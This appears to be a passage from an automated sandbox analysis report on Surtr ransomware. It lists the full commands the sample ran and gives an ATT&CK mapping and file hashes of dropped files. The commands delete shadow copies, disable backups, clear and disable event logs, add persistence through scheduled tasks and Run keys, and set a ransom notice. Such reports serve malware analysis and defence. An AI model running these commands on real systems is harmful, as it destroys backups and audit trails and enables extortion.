C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
2⤵
PID:5960

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
2⤵
PID:6120

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7384

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
2⤵
PID:5476

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4620

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
2⤵
PID:6112

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4128

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
2⤵
PID:6096

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7228

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
2⤵
PID:6072

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
2⤵
PID:5996

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
2⤵
PID:5940

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
3⤵
PID:980

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
2⤵
PID:5856

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1896

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
2⤵
PID:5848

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7396

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
2⤵
PID:5840

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
3⤵
PID:2752

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
2⤵
PID:6424

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6324

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
2⤵
PID:6524

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
2⤵
PID:6620

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4264

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
2⤵
PID:5772

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:2796

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:5764

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:8152

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
2⤵
PID:5692

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:8176

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
2⤵
PID:6748

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
2⤵
PID:6964

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7652

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
2⤵
PID:7024

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:8088

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
2⤵
PID:7076

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4176

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
2⤵
PID:7160

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4616

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
2⤵
PID:6872

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4204

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:5612

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:8140

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
2⤵
PID:7212

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7792

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
2⤵
PID:7360

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:4804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
2⤵
PID:7860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
2⤵
PID:5936

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PublicData_0r6fjlh4j8u4ts.surt" "%TEMP%\Service\PublicData_0r6fjlh4j8u4ts.surt"
2⤵
PID:5172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PrivateData_0r6fjlh4j8u4ts.surt" "%TEMP%\Service\PrivateData_0r6fjlh4j8u4ts.surt"
2⤵
PID:4400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
2⤵
PID:5256

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
2⤵
PID:5128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
2⤵
PID:5508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
2⤵
PID:5600

C:\Windows\SysWOW64\attrib.exe
attrib +R /S "C:\ProgramData\Service"
3⤵
- Views/modifies file attributes
PID:4964

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
2⤵
PID:5496

C:\Windows\SysWOW64\attrib.exe
attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
3⤵
- Views/modifies file attributes
PID:4888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
2⤵
PID:5936

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:5172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
2⤵
PID:1180

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
3⤵
- Creates scheduled task(s)
PID:5328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
2⤵
- Drops startup file
PID:5616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
2⤵
PID:5004

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
3⤵
- Adds Run key to start application
PID:6724

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
2⤵
PID:1632

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
3⤵
- Adds Run key to start application
PID:7096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
2⤵
PID:4656

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
3⤵
- Adds Run key to start application
PID:5888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
2⤵
PID:4500

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
3⤵
- Adds Run key to start application
PID:4712

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
2⤵
PID:1972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Setup
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7196

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
2⤵
PID:4604

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl System
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1904

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
2⤵
PID:6896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Application
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5540

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe sl Security /e:false
2⤵
PID:284

C:\Windows\system32\wevtutil.exe
wevtutil.exe sl Security /e:false
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6280

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
2⤵
PID:7024

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Security
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5276

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
2⤵
PID:292

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
3⤵
- Creates scheduled task(s)
PID:5268

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
2⤵
PID:4860

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
3⤵
PID:5444

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
2⤵
PID:7064

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
3⤵
PID:6088

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "Tribute to the REvil <3" /f
2⤵
PID:4544

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "Tribute to the REvil <3" /f
3⤵
PID:5568

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Unfortunately , ALL Your Important Files Have Been Encrypted and Stolen By Surtr Ransomware. Find SURTR_README files and follow instructions." /f
2⤵
PID:6424

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Unfortunately , ALL Your Important Files Have Been Encrypted and Stolen By Surtr Ransomware. Find SURTR_README files and follow instructions." /f
3⤵
PID:4724

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "C:\ProgramData\Service\Surtr.exe"
2⤵
PID:5992

C:\Windows\SysWOW64\attrib.exe
attrib +h +s "C:\ProgramData\Service\Surtr.exe"
3⤵
- Views/modifies file attributes
PID:4696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%TEMP%\Service\Surtr.exe"
2⤵
PID:4312

C:\Windows\SysWOW64\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exe"
3⤵
- Views/modifies file attributes
PID:5264

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe"
2⤵
PID:4956

C:\Windows\SysWOW64\attrib.exe
attrib +h +s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe"
3⤵
- Views/modifies file attributes
PID:1812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
2⤵
PID:5584

C:\Windows\SysWOW64\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
3⤵
- Drops startup file
- Views/modifies file attributes
PID:6064

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\Service\SurtrBackGround.jpg
2⤵
PID:4260

C:\Windows\SysWOW64\attrib.exe
attrib +h +s C:\ProgramData\Service\SurtrBackGround.jpg
3⤵
- Views/modifies file attributes
PID:5472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h C:\ProgramData\Service\SurtrIcon.ico
2⤵
PID:4676

C:\Windows\SysWOW64\attrib.exe
attrib +h C:\ProgramData\Service\SurtrIcon.ico
3⤵
- Views/modifies file attributes
PID:5720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr /va /f
2⤵
PID:5480

C:\Windows\SysWOW64\reg.exe
reg DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr /va /f
3⤵
PID:4828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr\UserChoice /v ProgId /t REG_SZ /d surtr_auto_file /f
2⤵
PID:6364

C:\Windows\SysWOW64\reg.exe
reg ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr\UserChoice /v ProgId /t REG_SZ /d surtr_auto_file /f
3⤵
PID:452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg ADD HKEY_CLASSES_ROOT\.surtr /ve /t REG_SZ /d surtr_auto_file /f
2⤵
PID:5024

C:\Windows\SysWOW64\reg.exe
reg ADD HKEY_CLASSES_ROOT\.surtr /ve /t REG_SZ /d surtr_auto_file /f
3⤵
- Modifies registry class
PID:5032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg ADD HKEY_CLASSES_ROOT\surtr_auto_file\DefaultIcon /ve /t REG_SZ /d "C:\ProgramData\Service\SurtrIcon.ico" /f
2⤵
PID:4880

C:\Windows\SysWOW64\reg.exe
reg ADD HKEY_CLASSES_ROOT\surtr_auto_file\DefaultIcon /ve /t REG_SZ /d "C:\ProgramData\Service\SurtrIcon.ico" /f
3⤵
- Modifies registry class
PID:5536

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
2⤵
PID:6468

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:5488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cls
2⤵
PID:5652

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6952

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7288

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:3408

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:4876

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k wusvcs -p
1⤵
PID:5244

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Indicator Removal on Host

T1070

File Deletion

T1107

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Data Destruction

T1485

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe
MD5
664cf36657bf55f20cac44505d3bbb2c

SHA1
a48f8089455201895757503255d0f573ce5d3c66

SHA256
4a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35

SHA512
42a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735

Download Submit
C:\ProgramData\Service\ID_DATA.surt
MD5
6a9c4d683eb1fd05b1e465f85f6e330d

SHA1
790812841eb765ae2b652870e94a0228bb0f87c8

SHA256
576215c8df54d9bf4b24893b858d944b865c70c69c5b44c4e4bb9ba7b4da3934

SHA512
af32822511e114affbdce6f2cabbdb0093f9eebad35f118106bc1a56f780d542a406e8c6321adc83359dc5ab25b4e9f6301c32de2bc0c3b37c0976e3ae84d7ce

Download Submit
C:\ProgramData\Service\PrivateData_0r6fjlh4j8u4ts.surt
MD5
ff2c8ac371eb8b2045f804aecf15ce48

SHA1
04b49c0f8ed9a82b0af16d6db02a65564c4303d1

SHA256
e9b3a98e0faec2b5df4aec83f18e70af067a215e1559431679b2c21209350936

SHA512
fe950c9ad7d85c301c49e9b50bc80873697029b3ce982b0ace49d3e27dfd111e2274aecc28aa447ad19eb98e61411f137857d180f2b3f4eea08e73495fb986ce

Download Submit
C:\ProgramData\Service\PublicData_0r6fjlh4j8u4ts.surt
MD5
76f1be0a10ef76babfb5cf1a236aba51

SHA1
7994d2552916faddc5da25b91f4f1a67227a2ca6

SHA256
390334635beee3ed19baaf68f5270b84c8ebe7b27c9afe578b2fac614944a3e1

SHA512
e8484a43700ddd5f6c5f0c74a09cfeb38cad9d4e3b7624ae6afbddbeba66a6d2603c2590691f5d3cd03975950e6b39393823022606a1939c82894301a76b3d11

Download Submit
C:\ProgramData\Service\SURTR_README.hta
MD5
0cf4fbd6b2d441cfa231fa5ebe768595

SHA1
6395154e01920d200d15e49d6671a0bd47515361

SHA256
4897e7b2d16870416c2c0bfc3e5da1e0cba52945c34f6d60a56220dceb6bd616

SHA512
1c9c1a57d43f1ce350797e8ba7d2bf07c2e29c93c76ecb1095d850cbe37c7a9665ca100c0dc858e079383763301bdd51f7d106728aa1aeaf3ef1ebee5c1176b7

Download Submit
C:\ProgramData\Service\SURTR_README.txt
MD5
d91dfe6ec91080570aa9d347d4554248

SHA1
ecff8162a6b9cc6e93526c673977d95d491cfacd

SHA256
11ab8837863ed5ae2063446dad6279eb5ec52de6f3c23b65449b5033715419e5

SHA512
63c421e4f4e1f14a2b23ad36178402183a882ca63d7b9618aa17146a8deb3e1e2985f788c3b3aa51b7a5968f777c6fa0fdd10e6e46668c2bb7f54c3d03f39fa7

Download Submit
C:\ProgramData\Service\Surtr.exe
MD5
664cf36657bf55f20cac44505d3bbb2c

SHA1
a48f8089455201895757503255d0f573ce5d3c66

SHA256
4a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35

SHA512
42a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735

Download Submit
C:\ProgramData\Service\SurtrBackGround.jpg
MD5
33f7fc301be9d39fcb474fb8b1e5f42e

SHA1
a3bf9ddb2ac53bc4b12b249825189a7c7a07b766

SHA256
99cd579177b2480dab17d125bcabe16f503b467208c2568c5564d13ffb457d03

SHA512
6cf0f2a65cc9d001087b8a685f1199ece6cd6e25f91b421a5a176ed8a1578e9b5da5fd4cd1708fc3639c30f1724e238ad6d4a2b09d45b53737468b31ddf50d00

Download Submit
C:\ProgramData\Service\SurtrIcon.ico
MD5
3257eb22824b57fe3d58074bca3128d3

SHA1
6f60ff4e7419ccdbc3d0dedc8474a0722d7d0a97

SHA256
5afba257ff405ceb733b2b6f270a16c8e0fffe92e6c91c6554a2ea4706e8c3ad

SHA512
7b41c8714aa64bd5a3a9e782a5bda8875882182863c9dd11273c168ef2b064f2c31c6c0e9d30f9db7ff99dae0542773f9a8ef995830c427d167120711ab4878d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exe
MD5
664cf36657bf55f20cac44505d3bbb2c

SHA1
a48f8089455201895757503255d0f573ce5d3c66

SHA256
4a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35

SHA512
42a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe
MD5
664cf36657bf55f20cac44505d3bbb2c

SHA1
a48f8089455201895757503255d0f573ce5d3c66

SHA256
4a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35

SHA512
42a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735

Download Submit